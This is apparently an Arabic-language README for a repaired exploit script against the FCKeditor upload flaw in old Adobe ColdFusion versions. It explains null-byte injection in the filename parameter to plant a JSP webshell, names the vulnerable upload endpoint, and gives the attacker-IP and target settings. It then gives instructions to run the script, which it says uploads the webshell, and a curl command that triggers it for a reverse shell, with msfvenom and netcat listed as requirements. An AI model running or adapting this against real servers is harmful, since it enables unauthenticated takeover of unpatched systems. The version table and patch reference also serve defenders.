
إصلاح لسكربت الاستغلال غير العامل على exploitdb (50057.py)
تنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر رفع ملفات عشوائية في مكوّن FCKeditor المضمّن مع ColdFusion. تقبل نقطة نهاية رفع الملفات حقن بايت فارغ في معامل اسم الملف، مما يسمح برفع JSP webshell وتنفيذه مباشرةً بواسطة الخادم.
| الإصدار | الحالة |
|---|---|
| ColdFusion 8.0 | مصاب |
| ColdFusion 8.0.1 | مصاب |
| ColdFusion 9.0 | مصاب* |
| ColdFusion MX 6.x | مصاب |
| ColdFusion MX 7.x | مصاب |
| ColdFusion 9.0.1+ | مُرقّع |
| ColdFusion 10+ | غير متأثر |
*ColdFusion 9.0 مصاب إذا لم تتم إزالة/تحديث مكوّن FCKeditor.
الترقيع: Adobe Security Bulletin APSB09-09 (يوليو 2009).
حرّر المتغيرات في أعلى السكربت:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
شغّل:
python3 poc.py
سيقوم السكربت بما يلي:
إذا لم يصل الـ shell خلال بضع ثوانٍ، شغّله يدويًا:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
يُطبع اسم الملف إلى stdout بعد الرفع.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm